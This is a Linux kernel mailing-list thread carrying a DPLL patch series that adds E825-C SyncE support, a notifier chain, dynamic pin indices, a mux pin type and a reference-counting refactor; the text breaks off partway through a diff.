This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
From: Petr Oros <poros@redhat.com> Currently, the DPLL subsystem reports events (creation, deletion, changes) to userspace via Netlink. However, there is no mechanism for other kernel components to be notified of these events directly. Add a raw notifier chain to the DPLL core protected by dpll_lock. This allows other kernel subsystems or drivers to register callbacks and receive notifications when DPLL devices or pins are created, deleted, or modified. Define the following: - Registration helpers: {,un}register_dpll_notifier() - Event types: DPLL_DEVICE_CREATED, DPLL_PIN_CREATED, etc. - Context structures: dpll_{device,pin}_notifier_info to pass relevant data to the listeners. The notification chain is invoked alongside the existing Netlink event generation to ensure in-kernel listeners are kept in sync with the subsystem state. Reviewed-by: Vadim Fedorenko <vadim.fedorenko@linux.dev> Co-developed-by: Ivan Vecera <ivecera@redhat.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> Signed-off-by: Petr Oros <poros@redhat.com> --- drivers/dpll/dpll_core.c | 57 +++++++++++++++++++++++++++++++++++++ drivers/dpll/dpll_core.h | 4 +++ drivers/dpll/dpll_netlink.c | 6 ++++ include/linux/dpll.h | 29 +++++++++++++++++++ 4 files changed, 96 insertions(+) diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index f04ed7195cadd..b05fe2ba46d91 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -23,6 +23,8 @@ DEFINE_MUTEX(dpll_lock); DEFINE_XARRAY_FLAGS(dpll_device_xa, XA_FLAGS_ALLOC); DEFINE_XARRAY_FLAGS(dpll_pin_xa, XA_FLAGS_ALLOC); +static RAW_NOTIFIER_HEAD(dpll_notifier_chain); + static u32 dpll_device_xa_id; static u32 dpll_pin_xa_id; @@ -46,6 +48,39 @@ struct dpll_pin_registration { void *cookie; }; +static int call_dpll_notifiers(unsigned long action, void *info) +{ + lockdep_assert_held(&dpll_lock); + return raw_notifier_call_chain(&dpll_notifier_chain, action, info); +} + +void dpll_device_notify(struct dpll_device *dpll, unsigned long action) +{ + struct dpll_device_notifier_info info = { + .dpll = dpll, + .id = dpll->id, + .idx = dpll->device_idx, + .clock_id = dpll->clock_id, + .type = dpll->type, + }; + + call_dpll_notifiers(action, &info); +} + +void dpll_pin_notify(struct dpll_pin *pin, unsigned long action) +{ + struct dpll_pin_notifier_info info = { + .pin = pin, + .id = pin->id, + .idx = pin->pin_idx, + .clock_id = pin->clock_id, + .fwnode = pin->fwnode, + .prop = &pin->prop, + }; + + call_dpll_notifiers(action, &info); +} + struct dpll_device *dpll_device_get_by_id(int id) { if (xa_get_mark(&dpll_device_xa, id, DPLL_REGISTERED)) @@ -539,6 +574,28 @@ void dpll_netdev_pin_clear(struct net_device *dev) } EXPORT_SYMBOL(dpll_netdev_pin_clear); +int register_dpll_notifier(struct notifier_block *nb) +{ + int ret; + + mutex_lock(&dpll_lock); + ret = raw_notifier_chain_register(&dpll_notifier_chain, nb); + mutex_unlock(&dpll_lock); + return ret; +} +EXPORT_SYMBOL_GPL(register_dpll_notifier); + +int unregister_dpll_notifier(struct notifier_block *nb) +{ + int ret; + + mutex_lock(&dpll_lock); + ret = raw_notifier_chain_unregister(&dpll_notifier_chain, nb); + mutex_unlock(&dpll_lock); + return ret; +} +EXPORT_SYMBOL_GPL(unregister_dpll_notifier); + /** * dpll_pin_get - find existing or create new dpll pin * @clock_id: clock_id of creator diff --git a/drivers/dpll/dpll_core.h b/drivers/dpll/dpll_core.h index d3e17ff0ecef0..b7b4bb251f739 100644 --- a/drivers/dpll/dpll_core.h +++ b/drivers/dpll/dpll_core.h @@ -91,4 +91,8 @@ struct dpll_pin_ref *dpll_xa_ref_dpll_first(struct xarray *xa_refs); extern struct xarray dpll_device_xa; extern struct xarray dpll_pin_xa; extern struct mutex dpll_lock; + +void dpll_device_notify(struct dpll_device *dpll, unsigned long action); +void dpll_pin_notify(struct dpll_pin *pin, unsigned long action); + #endif diff --git a/drivers/dpll/dpll_netlink.c b/drivers/dpll/dpll_netlink.c index 904199ddd1781..83cbd64abf5a4 100644 --- a/drivers/dpll/dpll_netlink.c +++ b/drivers/dpll/dpll_netlink.c @@ -761,17 +761,20 @@ dpll_device_event_send(enum dpll_cmd event, struct dpll_device *dpll) int dpll_device_create_ntf(struct dpll_device *dpll) { + dpll_device_notify(dpll, DPLL_DEVICE_CREATED); return dpll_device_event_send(DPLL_CMD_DEVICE_CREATE_NTF, dpll); } int dpll_device_delete_ntf(struct dpll_device *dpll) { + dpll_device_notify(dpll, DPLL_DEVICE_DELETED); return dpll_device_event_send(DPLL_CMD_DEVICE_DELETE_NTF, dpll); } static int __dpll_device_change_ntf(struct dpll_device *dpll) { + dpll_device_notify(dpll, DPLL_DEVICE_CHANGED); return dpll_device_event_send(DPLL_CMD_DEVICE_CHANGE_NTF, dpll); } @@ -829,16 +832,19 @@ dpll_pin_event_send(enum dpll_cmd event, struct dpll_pin *pin) int dpll_pin_create_ntf(struct dpll_pin *pin) { + dpll_pin_notify(pin, DPLL_PIN_CREATED); return dpll_pin_event_send(DPLL_CMD_PIN_CREATE_NTF, pin); } int dpll_pin_delete_ntf(struct dpll_pin *pin) { + dpll_pin_notify(pin, DPLL_PIN_DELETED); return dpll_pin_event_send(DPLL_CMD_PIN_DELETE_NTF, pin); } int __dpll_pin_change_ntf(struct dpll_pin *pin) { + dpll_pin_notify(pin, DPLL_PIN_CHANGED); return dpll_pin_event_send(DPLL_CMD_PIN_CHANGE_NTF, pin); } diff --git a/include/linux/dpll.h b/include/linux/dpll.h index f2e8660e90cdf..8ed90dfc65f05 100644 --- a/include/linux/dpll.h +++ b/include/linux/dpll.h @@ -11,6 +11,7 @@ #include <linux/device.h> #include <linux/netlink.h> #include <linux/netdevice.h> +#include <linux/notifier.h> #include <linux/rtnetlink.h> struct dpll_device; @@ -172,6 +173,30 @@ struct dpll_pin_properties { u32 phase_gran; }; +#define DPLL_DEVICE_CREATED 1 +#define DPLL_DEVICE_DELETED 2 +#define DPLL_DEVICE_CHANGED 3 +#define DPLL_PIN_CREATED 4 +#define DPLL_PIN_DELETED 5 +#define DPLL_PIN_CHANGED 6 + +struct dpll_device_notifier_info { + struct dpll_device *dpll; + u32 id; + u32 idx; + u64 clock_id; + enum dpll_type type; +}; + +struct dpll_pin_notifier_info { + struct dpll_pin *pin; + u32 id; + u32 idx; + u64 clock_id; + const struct fwnode_handle *fwnode; + const struct dpll_pin_properties *prop; +}; + #if IS_ENABLED(CONFIG_DPLL) void dpll_netdev_pin_set(struct net_device *dev, struct dpll_pin *dpll_pin); void dpll_netdev_pin_clear(struct net_device *dev); @@ -242,4 +267,8 @@ int dpll_device_change_ntf(struct dpll_device *dpll); int dpll_pin_change_ntf(struct dpll_pin *pin); +int register_dpll_notifier(struct notifier_block *nb); + +int unregister_dpll_notifier(struct notifier_block *nb); + #endif -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:32 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Allow drivers to register DPLL pins without manually specifying a pin index. Currently, drivers must provide a unique pin index when calling dpll_pin_get(). This works well for hardware-mapped pins but creates friction for drivers handling virtual pins or those without a strict hardware indexing scheme. Introduce DPLL_PIN_IDX_UNSPEC (U32_MAX). When a driver passes this value as the pin index: 1. The core allocates a unique index using an IDA 2. The allocated index is mapped to a range starting above `INT_MAX` This separation ensures that dynamically allocated indices never collide with standard driver-provided hardware indices, which are assumed to be within the `0` to `INT_MAX` range. The index is automatically freed when the pin is released in dpll_pin_put(). Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- v2: * fixed integer overflow in dpll_pin_idx_free() --- drivers/dpll/dpll_core.c | 48 ++++++++++++++++++++++++++++++++++++++-- include/linux/dpll.h | 2 ++ 2 files changed, 48 insertions(+), 2 deletions(-) diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index b05fe2ba46d91..59081cf2c73ae 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -10,6 +10,7 @@ #include <linux/device.h> #include <linux/err.h> +#include <linux/idr.h> #include <linux/property.h> #include <linux/slab.h> #include <linux/string.h> @@ -24,6 +25,7 @@ DEFINE_XARRAY_FLAGS(dpll_device_xa, XA_FLAGS_ALLOC); DEFINE_XARRAY_FLAGS(dpll_pin_xa, XA_FLAGS_ALLOC); static RAW_NOTIFIER_HEAD(dpll_notifier_chain); +static DEFINE_IDA(dpll_pin_idx_ida); static u32 dpll_device_xa_id; static u32 dpll_pin_xa_id; @@ -464,6 +466,36 @@ void dpll_device_unregister(struct dpll_device *dpll, } EXPORT_SYMBOL_GPL(dpll_device_unregister); +static int dpll_pin_idx_alloc(u32 *pin_idx) +{ + int ret; + + if (!pin_idx) + return -EINVAL; + + /* Alloc unique number from IDA. Number belongs to <0, INT_MAX> range */ + ret = ida_alloc(&dpll_pin_idx_ida, GFP_KERNEL); + if (ret < 0) + return ret; + + /* Map the value to dynamic pin index range <INT_MAX+1, U32_MAX> */ + *pin_idx = (u32)ret + INT_MAX + 1; + + return 0; +} + +static void dpll_pin_idx_free(u32 pin_idx) +{ + if (pin_idx <= INT_MAX) + return; /* Not a dynamic pin index */ + + /* Map the index value from dynamic pin index range to IDA range and + * free it. + */ + pin_idx -= (u32)INT_MAX + 1; + ida_free(&dpll_pin_idx_ida, pin_idx); +} + static void dpll_pin_prop_free(struct dpll_pin_properties *prop) { kfree(prop->package_label); @@ -521,9 +553,18 @@ dpll_pin_alloc(u64 clock_id, u32 pin_idx, struct module *module, struct dpll_pin *pin; int ret; + if (pin_idx == DPLL_PIN_IDX_UNSPEC) { + ret = dpll_pin_idx_alloc(&pin_idx); + if (ret) + return ERR_PTR(ret); + } else if (pin_idx > INT_MAX) { + return ERR_PTR(-EINVAL); + } pin = kzalloc(sizeof(*pin), GFP_KERNEL); - if (!pin) - return ERR_PTR(-ENOMEM); + if (!pin) { + ret = -ENOMEM; + goto err_pin_alloc; + } pin->pin_idx = pin_idx; pin->clock_id = clock_id; pin->module = module; @@ -551,6 +592,8 @@ dpll_pin_alloc(u64 clock_id, u32 pin_idx, struct module *module, dpll_pin_prop_free(&pin->prop); err_pin_prop: kfree(pin); +err_pin_alloc: + dpll_pin_idx_free(pin_idx); return ERR_PTR(ret); } @@ -654,6 +697,7 @@ void dpll_pin_put(struct dpll_pin *pin) xa_destroy(&pin->ref_sync_pins); dpll_pin_prop_free(&pin->prop); fwnode_handle_put(pin->fwnode); + dpll_pin_idx_free(pin->pin_idx); kfree_rcu(pin, rcu); } mutex_unlock(&dpll_lock); diff --git a/include/linux/dpll.h b/include/linux/dpll.h index 8ed90dfc65f05..8fff048131f1d 100644 --- a/include/linux/dpll.h +++ b/include/linux/dpll.h @@ -240,6 +240,8 @@ int dpll_device_register(struct dpll_device *dpll, enum dpll_type type, void dpll_device_unregister(struct dpll_device *dpll, const struct dpll_device_ops *ops, void *priv); +#define DPLL_PIN_IDX_UNSPEC U32_MAX + struct dpll_pin * dpll_pin_get(u64 clock_id, u32 dev_driver_id, struct module *module, const struct dpll_pin_properties *prop); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:33 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Add parsing for the "mux" string in the 'connection-type' pin property mapping it to DPLL_PIN_TYPE_MUX. Recognizing this type in the driver allows these pins to be taken as parent pins for pin-on-pin pins coming from different modules (e.g. network drivers). Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- drivers/dpll/zl3073x/prop.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/dpll/zl3073x/prop.c b/drivers/dpll/zl3073x/prop.c index 4ed153087570b..ad1f099cbe2b5 100644 --- a/drivers/dpll/zl3073x/prop.c +++ b/drivers/dpll/zl3073x/prop.c @@ -249,6 +249,8 @@ struct zl3073x_pin_props *zl3073x_pin_props_get(struct zl3073x_dev *zldev, props->dpll_props.type = DPLL_PIN_TYPE_INT_OSCILLATOR; else if (!strcmp(type, "synce")) props->dpll_props.type = DPLL_PIN_TYPE_SYNCE_ETH_PORT; + else if (!strcmp(type, "mux")) + props->dpll_props.type = DPLL_PIN_TYPE_MUX; else dev_warn(zldev->dev, "Unknown or unsupported pin type '%s'\n", -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:34 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Refactor the reference counting mechanism for DPLL devices and pins to improve consistency and prevent potential lifetime issues. Introduce internal helpers __dpll_{device,pin}_{hold,put}() to centralize reference management. Update the internal XArray reference helpers (dpll_xa_ref_*) to automatically grab a reference to the target object when it is added to a list, and release it when removed. This ensures that objects linked internally (e.g., pins referenced by parent pins) are properly kept alive without relying on the caller to manually manage the count. Consequently, remove the now redundant manual `refcount_inc/dec` calls in dpll_pin_on_pin_{,un}register()`, as ownership is now correctly handled by the dpll_xa_ref_* functions. Additionally, ensure that dpll_device_{,un}register()` takes/releases a reference to the device, ensuring the device object remains valid for the duration of its registration. Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- drivers/dpll/dpll_core.c | 74 +++++++++++++++++++++++++++------------- 1 file changed, 50 insertions(+), 24 deletions(-) diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index 59081cf2c73ae..f6ab4f0cad84d 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -83,6 +83,45 @@ void dpll_pin_notify(struct dpll_pin *pin, unsigned long action) call_dpll_notifiers(action, &info); } +static void __dpll_device_hold(struct dpll_device *dpll) +{ + refcount_inc(&dpll->refcount); +} + +static void __dpll_device_put(struct dpll_device *dpll) +{ + if (refcount_dec_and_test(&dpll->refcount)) { + ASSERT_DPLL_NOT_REGISTERED(dpll); + WARN_ON_ONCE(!xa_empty(&dpll->pin_refs)); + xa_destroy(&dpll->pin_refs); + xa_erase(&dpll_device_xa, dpll->id); + WARN_ON(!list_empty(&dpll->registration_list)); + kfree(dpll); + } +} + +static void __dpll_pin_hold(struct dpll_pin *pin) +{ + refcount_inc(&pin->refcount); +} + +static void dpll_pin_idx_free(u32 pin_idx); +static void dpll_pin_prop_free(struct dpll_pin_properties *prop); + +static void __dpll_pin_put(struct dpll_pin *pin) +{ + if (refcount_dec_and_test(&pin->refcount)) { + xa_erase(&dpll_pin_xa, pin->id); + xa_destroy(&pin->dpll_refs); + xa_destroy(&pin->parent_refs); + xa_destroy(&pin->ref_sync_pins); + dpll_pin_prop_free(&pin->prop); + fwnode_handle_put(pin->fwnode); + dpll_pin_idx_free(pin->pin_idx); + kfree_rcu(pin, rcu); + } +} + struct dpll_device *dpll_device_get_by_id(int id) { if (xa_get_mark(&dpll_device_xa, id, DPLL_REGISTERED)) @@ -152,6 +191,7 @@ dpll_xa_ref_pin_add(struct xarray *xa_pins, struct dpll_pin *pin, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; + __dpll_pin_hold(pin); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -174,6 +214,7 @@ static int dpll_xa_ref_pin_del(struct xarray *xa_pins, struct dpll_pin *pin, if (WARN_ON(!reg)) return -EINVAL; list_del(&reg->list); + __dpll_pin_put(pin); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_pins, i); @@ -231,6 +272,7 @@ dpll_xa_ref_dpll_add(struct xarray *xa_dplls, struct dpll_device *dpll, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; + __dpll_device_hold(dpll); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -253,6 +295,7 @@ dpll_xa_ref_dpll_del(struct xarray *xa_dplls, struct dpll_device *dpll, if (WARN_ON(!reg)) return; list_del(&reg->list); + __dpll_device_put(dpll); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_dplls, i); @@ -323,8 +366,8 @@ dpll_device_get(u64 clock_id, u32 device_idx, struct module *module) if (dpll->clock_id == clock_id && dpll->device_idx == device_idx && dpll->module == module) { + __dpll_device_hold(dpll); ret = dpll; - refcount_inc(&ret->refcount); break; } } @@ -347,14 +390,7 @@ EXPORT_SYMBOL_GPL(dpll_device_get); void dpll_device_put(struct dpll_device *dpll) { mutex_lock(&dpll_lock); - if (refcount_dec_and_test(&dpll->refcount)) { - ASSERT_DPLL_NOT_REGISTERED(dpll); - WARN_ON_ONCE(!xa_empty(&dpll->pin_refs)); - xa_destroy(&dpll->pin_refs); - xa_erase(&dpll_device_xa, dpll->id); - WARN_ON(!list_empty(&dpll->registration_list)); - kfree(dpll); - } + __dpll_device_put(dpll); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_device_put); @@ -416,6 +452,7 @@ int dpll_device_register(struct dpll_device *dpll, enum dpll_type type, reg->ops = ops; reg->priv = priv; dpll->type = type; + __dpll_device_hold(dpll); first_registration = list_empty(&dpll->registration_list); list_add_tail(&reg->list, &dpll->registration_list); if (!first_registration) { @@ -455,6 +492,7 @@ void dpll_device_unregister(struct dpll_device *dpll, return; } list_del(&reg->list); + __dpll_device_put(dpll); kfree(reg); if (!list_empty(&dpll->registration_list)) { @@ -666,8 +704,8 @@ dpll_pin_get(u64 clock_id, u32 pin_idx, struct module *module, if (pos->clock_id == clock_id && pos->pin_idx == pin_idx && pos->module == module) { + __dpll_pin_hold(pos); ret = pos; - refcount_inc(&ret->refcount); break; } } @@ -690,16 +728,7 @@ 